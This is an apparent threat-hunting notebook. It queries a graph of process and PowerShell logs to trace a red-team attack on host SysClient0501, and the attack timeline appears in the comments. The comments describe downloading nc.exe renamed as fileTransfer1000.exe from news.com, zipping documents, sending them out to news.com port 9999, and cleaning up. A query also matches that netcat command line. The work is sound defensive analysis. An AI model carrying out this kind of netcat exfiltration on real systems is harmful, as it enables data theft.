#-- 09/24/19 13:44:34 -- On Sysclient0501 via RDP session, exfiltrated export.zip to news.com port 9999 using fileTransfer1000.exe (nc.exe)
#-- 09/24/19 13:45:12 -- On Sysclient0501 via RDP session, cleaned up fileTransfer1000.exe and export.zip

#based on parenteprocess of the execution of nc (fileTransfer1000.exe) in previous

manually_run_malware= gds.run_cypher("""
MATCH (y:Process)-[:Parent]->(p:Process)
where y.CommandLine contains 'fileTransfer1000.exe" news.com 9999'
RETURN p.EventTime as EventTime, p.Hostname as Hostname ,p.CommandLine as CommandLine ,p.CommandLine_length as CommandLine_Length,p.network_degree as Network_Degree,p.direct_children as Direct_Children,p.Image_path as Image_Path,p.ProcessGuid as ProcessGuid,p.numbers_of_executed_commands as Numbers_of_executed_commands,p.malicious as Malicious
""") 


In [37]:
manually_run_malware

,EventTime,Hostname,CommandLine,CommandLine_Length,Network_Degree,Direct_Children,Image_Path,ProcessGuid,Numbers_of_executed_commands,Malicious
0,2019-09-24 13:27:13.397000-04:00,SysClient0501.systemia.com,"""PowerShell.exe"" -noexit -command Set-Location -literalPath 'C:\Users\sysadmin\Downloads'",89,0.0,6.0,PowerShell.exe,7e2bdb05-f1d7-439e-8daf-3c045535afda,108.0,0
1,2019-09-24 13:27:13.397000-04:00,SysClient0501.systemia.com,"""PowerShell.exe"" -noexit -command Set-Location -literalPath 'C:\Users\sysadmin\Downloads'",89,0.0,6.0,PowerShell.exe,7e2bdb05-f1d7-439e-8daf-3c045535afda,108.0,0


In [38]:
#-- 09/24/19 13:26:57 -- On Sysclient0501 via RDP session, downloaded fileTransfer1000.exe (nc.exe) from news.com:8080 via chrome.
#-- 09/24/19 13:31:29 -- On Sysclient0501 via RDP session, compressed documents in C:\documents for exfiltration.
#-- 09/24/19 13:44:34 -- On Sysclient0501 via RDP session, exfiltrated export.zip to news.com port 9999 using fileTransfer1000.exe (nc.exe)
#-- 09/24/19 13:45:12 -- On Sysclient0501 via RDP session, cleaned up fileTransfer1000.exe and export.zip

#based on parenteprocess of the execution of nc (fileTransfer1000.exe) in previous 

manually_run_malware= gds.run_cypher("""
MATCH (p:Process{ProcessGuid: "7e2bdb05-f1d7-439e-8daf-3c045535afda"})
RETURN p.EventTime as EventTime, p.Hostname as Hostname ,p.CommandLine as CommandLine ,p.CommandLine_length as CommandLine_Length,p.network_degree as Network_Degree,p.direct_children as Direct_Children,p.Image_path as Image_Path,p.ProcessGuid as ProcessGuid,p.numbers_of_executed_commands as Numbers_of_executed_commands,p.malicious as Malicious
""") 




In [39]:
manually_run_malware

,EventTime,Hostname,CommandLine,CommandLine_Length,Network_Degree,Direct_Children,Image_Path,ProcessGuid,Numbers_of_executed_commands,Malicious
0,2019-09-24 13:27:13.397000-04:00,SysClient0501.systemia.com,"""PowerShell.exe"" -noexit -command Set-Location -literalPath 'C:\Users\sysadmin\Downloads'",89,0.0,6.0,PowerShell.exe,7e2bdb05-f1d7-439e-8daf-3c045535afda,108.0,0


In [40]:
%%time
#Declare the one we found to be malicious as malicious(exeuction of code)
gds.run_cypher("""
MATCH (p:Process{ProcessGuid: "7e2bdb05-f1d7-439e-8daf-3c045535afda"})
SET p.malicious = 1

""") 

CPU times: user 691 µs, sys: 1.61 ms, total: 2.31 ms
Wall time: 7.41 ms


""


In [41]:
## -- look at the shell commands executed by this one

shell_commands_executed= gds.run_cypher("""
MATCH (s:Shell {ProcessGuid: "7e2bdb05-f1d7-439e-8daf-3c045535afda"})
RETURN s.Command_Name,s.Command_Path,s.Command_Type,s.Hostname, s.Host_type, s.Console_Version, s.Principal, s.Runspace_ID,s.Script_Name,s.Sequence_Number,s.Severity_level,s.Shell_User,s.Shell_type,s.User,s.timestamp_str
""") 

In [42]:
shell_commands_executed

,s.Command_Name,s.Command_Path,s.Command_Type,s.Hostname,s.Host_type,s.Console_Version,s.Principal,s.Runspace_ID,s.Script_Name,s.Sequence_Number,s.Severity_level,s.Shell_User,s.Shell_type,s.User,s.timestamp_str
0,Set-Location,,Cmdlet,SysClient0501.systemia.com,ConsoleHost,5.1.15063.1746,SYSTEMIACOM\sysadmin,858dc2b2-5703-4373-b6d5-2e01b2259ab7,,16,Informational,SYSTEMIACOM\sysadmin,Microsoft.PowerShell,None,2019-09-24 13:27:19.315000-04:00
1,,,Script,SysClient0501.systemia.com,ConsoleHost,5.1.15063.1746,SYSTEMIACOM\sysadmin,858dc2b2-5703-4373-b6d5-2e01b2259ab7,,18,Informational,SYSTEMIACOM\sysadmin,Microsoft.PowerShell,None,2019-09-24 13:27:19.316000-04:00
2,Get-Variable,,Cmdlet,SysClient0501.systemia.com,ConsoleHost,5.1.15063.1746,SYSTEMIACOM\sysadmin,858dc2b2-5703-4373-b6d5-2e01b2259ab7,,22,Informational,SYSTEMIACOM\sysadmin,Microsoft.PowerShell,None,2019-09-24 13:27:19.934000-04:00
3,Set-StrictMode,,Cmdlet,SysClient0501.systemia.com,ConsoleHost,5.1.15063.1746,SYSTEMIACOM\sysadmin,858dc2b2-5703-4373-b6d5-2e01b2259ab7,C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.2\PSReadLine.psm1,20,Informational,SYSTEMIACOM\sysadmin,Microsoft.PowerShell,None,2019-09-24 13:27:19.375000-04:00
4,Resolve-Path,,Cmdlet,SysClient0501.systemia.com,ConsoleHost,5.1.15063.1746,SYSTEMIACOM\sysadmin,858dc2b2-5703-4373-b6d5-2e01b2259ab7,,24,Informational,SYSTEMIACOM\sysadmin,Microsoft.PowerShell,None,2019-09-24 13:27:20.072000-04:00
...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...
103,Set-StrictMode,,Cmdlet,SysClient0501.systemia.com,ConsoleHost,5.1.15063.1746,SYSTEMIACOM\sysadmin,858dc2b2-5703-4373-b6d5-2e01b2259ab7,,224,Informational,SYSTEMIACOM\sysadmin,Microsoft.PowerShell,None,2019-09-24 13:41:32.907000-04:00
104,Set-StrictMode,,Cmdlet,SysClient0501.systemia.com,ConsoleHost,5.1.15063.1746,SYSTEMIACOM\sysadmin,858dc2b2-5703-4373-b6d5-2e01b2259ab7,,226,Informational,SYSTEMIACOM\sysadmin,Microsoft.PowerShell,None,2019-09-24 13:41:32.909000-04:00
105,,,Script,SysClient0501.systemia.com,ConsoleHost,5.1.15063.1746,SYSTEMIACOM\sysadmin,858dc2b2-5703-4373-b6d5-2e01b2259ab7,,228,Informational,SYSTEMIACOM\sysadmin,Microsoft.PowerShell,None,2019-09-24 13:41:32.950000-04:00
106,Set-StrictMode,,Cmdlet,SysClient0501.systemia.com,ConsoleHost,5.1.15063.1746,SYSTEMIACOM\sysadmin,858dc2b2-5703-4373-b6d5-2e01b2259ab7,C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.2\PSReadLine.psm1,230,Informational,SYSTEMIACOM\sysadmin,Microsoft.PowerShell,None,2019-09-24 13:41:32.953000-04:00


In [43]:
#### END of day 2 